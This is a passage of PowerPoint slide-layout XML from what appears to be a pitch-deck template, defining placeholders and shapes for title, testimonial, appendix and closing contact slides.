          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr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A32EC27-ACD8-47C0-A3ED-E4ED58D88358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6195160" y="2217849"/>
            <a:ext cx="43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9E8819A-135C-4A5C-9F6A-A3BE05AA294F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8703909" y="2216687"/>
            <a:ext cx="43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832941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Content Lay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anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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04263" y="1625821"/>
            <a:ext cx="6289862" cy="569085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7395281" y="1375202"/>
            <a:ext cx="4796719" cy="100800"/>
            <a:chOff x="439494" y="3240138"/>
            <a:chExt cx="299490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39494" y="3290538"/>
              <a:ext cx="2944508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958968" y="3372939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958968" y="2960253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6FF07C5-314A-4EA8-B78F-7A51C234D3A1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721841" y="2764036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691060D-E361-43B0-BFD7-43D7CC4E5CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3288596"/>
            <a:ext cx="72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4A98AB01-9578-4430-96AD-F434AF0CDA20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1957127" y="4800796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EF9D60F2-A1FB-4A95-997B-A4F1723AC1EC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1957127" y="4388110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id="{76A56D2A-42F0-40C5-96D7-B1AC33152A85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720000" y="4191893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F6D1C91-9136-4678-A712-92BE9B3902C4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1111670" y="4028309"/>
            <a:ext cx="324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BACF15AB-FF8A-422B-840D-88503024E5D3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5708709" y="3372939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EFC2028F-7DFE-412D-97DF-707D128D95E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="38" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5708709" y="2960253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4349A4F0-1181-4A58-BFD4-4783CD130356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5704578" y="4800796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DC1D5D83-8D32-491F-87EB-9DA9360D4F2B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5704578" y="4388110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50" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8120723F-A42C-4B81-97FD-6F575E5C2584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9453870" y="3372939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27D068F1-398F-4D11-977C-080C8151C786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9453870" y="2960253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B795705E-C5CB-46CC-9E41-D2269E07BC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9452029" y="4800796"/>
            <a:ext cx="2297722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80211A2B-0F3C-4DBE-AE01-069AE7FC3468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9452029" y="4388110"/>
            <a:ext cx="2297722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E5E9742-C670-47AB-AA69-AE65D7915B06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3531847" y="5364000"/>
            <a:ext cx="2988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158712DB-5183-45D8-9ABB-6E0795658012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7274194" y="5363999"/>
            <a:ext cx="2988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Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417A32F4-3459-4A31-A90E-AA771FD4D491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4467451" y="4191893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5" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63549FA7-92E5-4DB1-92FA-15902DFD3753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8214902" y="4191893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6" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F62D330-6A30-4A65-89DA-EDFE4AAD343E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4469292" y="2764036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2" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3FC286B-05E7-4E48-A7FD-197800349118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8216743" y="2764036"/>
            <a:ext cx="1106424" cy="1106423"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F1722"/>
          </a:solidFill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4431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C799DC18-D353-427C-B849-0204F13D9B3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6083300" cy="68580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015858-8549-49EA-BB83-070E0D9D4890}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083808" y="0"/>
            <a:ext cx="6108192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6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06FBAC-B8FD-4768-B682-E0B93BA331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69768" y="2133599"/>
            <a:ext cx="4618957" cy="2492461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>PITCH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>DECK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2534F-03A6-408A-9BF1-303D0A44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4E181-0C50-4F43-A5A7-6FDD1500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749CC-EB55-4FEF-AA4C-9A9C6E2A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F3E26A6-6962-4A35-AA86-805537D45296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6769768" y="1947412"/>
            <a:ext cx="2520148" cy="102440"/>
            <a:chOff x="3631690" y="2252140"/>
            <a:chExt cx="4389743" cy="10244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81504C4-12AC-4251-8E47-0089784BDB9B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92040D0-01C2-4643-8F84-3B8F334E545C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5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ED601E9-2BFC-460B-A2A8-69A787A4988E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7845854" y="2252140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B49A8A6-FEDB-4D20-B581-A84DB8EFE977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6769768" y="4654084"/>
            <a:ext cx="2520148" cy="100584"/>
            <a:chOff x="3631690" y="2253996"/>
            <a:chExt cx="4389742" cy="10058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F65998-5EC3-446A-8307-1CF81A348CE3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CC5D776-F60A-4A0C-AA7C-EFACDA2CEA8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4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EAFE309-55C5-409C-92ED-748307C74318}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7845853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Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B77B20B-76F5-4912-803D-5709F730D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9767" y="4889444"/>
            <a:ext cx="4618957" cy="590626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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4293BA4F-7776-4C41-BE4F-7247935D5CC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706368" y="3079602"/>
            <a:ext cx="1481328" cy="7589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076924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e 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1461974"/>
            <a:ext cx="4464049" cy="117717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092276"/>
            <a:ext cx="4443165" cy="1008841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811097"/>
            <a:ext cx="3149152" cy="100800"/>
            <a:chOff x="-1228304" y="3250524"/>
            <a:chExt cx="3149152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096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1820048" y="3250524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A5180A6-7D2B-4341-A749-16387D907EEF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1262770" y="4138611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79DFBEE7-50AA-4F4F-8B5D-AD23ECAD9919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262769" y="4499972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306EAF0C-F17D-47D6-BAA1-16745F4F70D9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3193135" y="4138611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D091E31C-C1DC-4D72-8C9E-3B6BD91E72AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3193134" y="4499972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F62E753C-C8BE-457D-9B22-6A8227347A67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5123499" y="4142294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BC1E8F6C-0BDD-4AFA-9E8D-5EF61AA59F50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5123498" y="4503655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C70C9772-55FF-4449-988F-6CDDE075E730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262770" y="4826750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75EE6DCE-6A55-4D95-85F7-E22E3E268256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1262769" y="5188111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84DC7882-7541-4AEA-95FE-DDBCF6F9CA32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3193135" y="4826750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5542D500-4CD6-4FDE-9133-F8020797D9B5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3193134" y="5188111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51" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{500C362B-BA02-4F7D-86F6-3F6F2EF20D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="53" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5123499" y="4830433"/>
            <a:ext cx="1283894" cy="349611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="18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$ 1,500,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E213E497-634E-40E7-BF08-765CC21529E2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5123498" y="5191794"/>
            <a:ext cx="1285861" cy="246279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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="14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Category Title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A01C659-0131-449B-BA07-5BC568F00BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790959" y="4258650"/>
            <a:ext cx="384048" cy="38404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69CB80EA-A8D6-4099-9412-0C14095755FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790959" y="4965077"/>
            <a:ext cx="384048" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="225B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2E20CCE5-B889-49FE-8FA6-A6F0F11A5D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725217" y="4261982"/>
            <a:ext cx="384048" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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769A77E3-4AFB-45BB-8FDC-4AD084EA9D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725217" y="4968409"/>
            <a:ext cx="384048" cy="38404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3A8B986-3280-4EAC-846B-9167ECC55646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660323" y="4257848"/>
            <a:ext cx="384048" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B531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AE6D315-5EC0-4956-B7BF-B94D2AFE679B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660323" y="4964275"/>
            <a:ext cx="384048" cy="38404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2" name="Chart Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED8422E-0C74-45EF-B794-252146C6639A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="55"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924675" y="860425"/>
            <a:ext cx="4483100" cy="457358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chart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="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8B7C827-F016-49F6-B775-FAC0E6420466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6905624" y="905669"/>
            <a:ext cx="4483100" cy="4483100"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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0F8D2C7-9093-4F92-B8A4-D819FEE69F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8294757" y="2294802"/>
            <a:ext cx="1704834" cy="1704834"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350"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DE9D0C0-04C1-4621-8B2D-E65A25A8DCF3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8675514" y="450000"/>
            <a:ext cx="900000" cy="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64905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4591" y="1411243"/>
            <a:ext cx="4494133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94591" y="2564787"/>
            <a:ext cx="4473108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924675" y="2314168"/>
            <a:ext cx="5267325" cy="100800"/>
            <a:chOff x="0" y="3240138"/>
            <a:chExt cx="3434400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894591" y="3189568"/>
            <a:ext cx="4482996" cy="2432603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CF430BFB-0A7C-4FB8-B93B-8DA19F3E634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3710" y="1792784"/>
            <a:ext cx="6073999" cy="372160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869787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EF099F-79D2-486F-A4B2-DD4F699752C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096000" y="0"/>
            <a:ext cx="6089650" cy="685800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1FF22294-F2E5-4C74-A30C-46BA988FD5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9959" y="1546091"/>
            <a:ext cx="4846923" cy="1091078"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>THANK YOU!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FC5C0DA6-1B31-4BDF-BAEB-BF797810284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5335" y="3083960"/>
            <a:ext cx="4586288" cy="509472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0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August Bergqvist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5E1647C9-9AC1-4500-A56E-94CABC656E0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1850" y="3703834"/>
            <a:ext cx="4586288" cy="23094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700" b="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Phone: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8605CECB-8164-4428-B478-98C42902F9F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950" y="3946707"/>
            <a:ext cx="4586288" cy="29016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+7 888 999-000-11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39B56C4-E128-4995-91CC-64C268BC760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8750" y="4423954"/>
            <a:ext cx="4586288" cy="23094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lang="ru-RU" sz="1700" b="0" i="1" kern="1200" dirty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Email:</a:t>
            </a:r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94772DA1-74CC-430C-9A8E-5A6586692CA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1850" y="4650785"/>
            <a:ext cx="4586288" cy="364479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Bergqvist@vanarsdelltd.com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7A073B5B-2BE3-49D1-A646-1492F534C94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1850" y="5153025"/>
            <a:ext cx="4586288" cy="23094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lang="ru-RU" sz="1700" b="0" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0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noProof="0"/>
              <a:t>Website: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52D10EDD-0329-4443-8665-7603E4A83B1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24950" y="5363814"/>
            <a:ext cx="4586288" cy="364479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/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>www.vanarsdelltd.com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F591C52-0202-44BA-A6BE-E2362516B893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="801543" y="2750589"/>
            <a:ext cx="4569895" cy="100800"/>
            <a:chOff x="808548" y="2750589"/>
            <a:chExt cx="4569895" cy="10080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9E4D57E-4989-4939-A31F-637543FAB606}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="808548" y="2750589"/>
              <a:ext cx="4505297" cy="100800"/>
              <a:chOff x="496859" y="3240138"/>
              <a:chExt cx="2937541" cy="100800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370B72A7-B625-48B8-88E6-BCE2A4DD531E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="496859" y="3285674"/>
                <a:ext cx="2887142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1ED729F-F8A5-4244-9776-4935C260F11F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ECBEDE0-51BB-48BD-AAAD-63B6F60C1D57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5277642" y="2750589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3E1608D-F119-4C0D-8D91-7CB089C037C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="801543" y="1660573"/>
            <a:ext cx="4575417" cy="105664"/>
            <a:chOff x="808548" y="2745725"/>
            <a:chExt cx="4575417" cy="105664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EBDC0121-6865-4B65-A28B-1CEDB16AAD9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="808548" y="2750589"/>
              <a:ext cx="4505297" cy="100800"/>
              <a:chOff x="496859" y="3240138"/>
              <a:chExt cx="2937541" cy="100800"/>
            </a:xfrm>
          </p:grpSpPr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386E3714-07DE-4318-B5BC-25F879B97D59}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="496859" y="3285674"/>
                <a:ext cx="2887142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2ECCE30B-E848-4C5E-83A1-A811D489E7B8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09817AEC-C67C-49A3-AC5A-669FD4D6D586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5283164" y="2745725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7883942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6C5B5AA-0D95-4C33-8EBC-90401B51BDB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032" y="1912946"/>
            <a:ext cx="12185968" cy="349300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48934" y="457496"/>
            <a:ext cx="4494133" cy="804338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>APPENDIX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08B302A-0F76-466E-9FCE-DCEECCBCF6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4736152" y="1509426"/>
            <a:ext cx="2719696" cy="100800"/>
            <a:chOff x="4732222" y="1509426"/>
            <a:chExt cx="2719696" cy="10080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9E4D57E-4989-4939-A31F-637543FAB606}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="4732222" y="1509426"/>
              <a:ext cx="2669296" cy="100800"/>
              <a:chOff x="1693969" y="3240138"/>
              <a:chExt cx="1740431" cy="100800"/>
            </a:xfrm>
          </p:grpSpPr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370B72A7-B625-48B8-88E6-BCE2A4DD531E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1693969" y="3290538"/>
                <a:ext cx="1690032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01ED729F-F8A5-4244-9776-4935C260F11F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3368676" y="3240138"/>
                <a:ext cx="65724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427C0C4F-6341-4BE0-931E-AAA6EA2AF137}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7351117" y="1509426"/>
              <a:ext cx="100801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257644894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stimonial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anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>TESTIMONIALS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7773282" y="1375202"/>
            <a:ext cx="4418718" cy="100800"/>
            <a:chOff x="675503" y="3240138"/>
            <a:chExt cx="2758897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75503" y="3290538"/>
              <a:ext cx="270849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4A98AB01-9578-4430-96AD-F434AF0CDA20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822459" y="4996962"/>
            <a:ext cx="1625324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Customer Title</a:t>
            </a:r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EF9D60F2-A1FB-4A95-997B-A4F1723AC1EC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822459" y="4191894"/>
            <a:ext cx="1625324" cy="720726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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A56D2A-42F0-40C5-96D7-B1AC33152A85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2447783" y="4435460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F6D1C91-9136-4678-A712-92BE9B3902C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3000995" y="3984820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D92A7B-1C40-4AEB-92C3-C35F8C01F1FA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803253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2E312F1-B417-47B6-97E4-7CCA31034F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950595" y="3930376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13DB5D84-04D8-4536-A06B-AED76E7C51D7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4586638" y="4996962"/>
            <a:ext cx="1625324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Customer Title</a:t>
            </a:r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3AB0AC7E-7919-422E-95A1-82E8B125756D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4586638" y="4191894"/>
            <a:ext cx="1625324" cy="720726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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B44FD76B-D1AE-458B-AF32-E4AA246B0881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6211962" y="4435460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07D22CD4-7F86-495D-B381-7D706058B916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6765174" y="3984820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 Placeholder 3">
            <a:extLst>
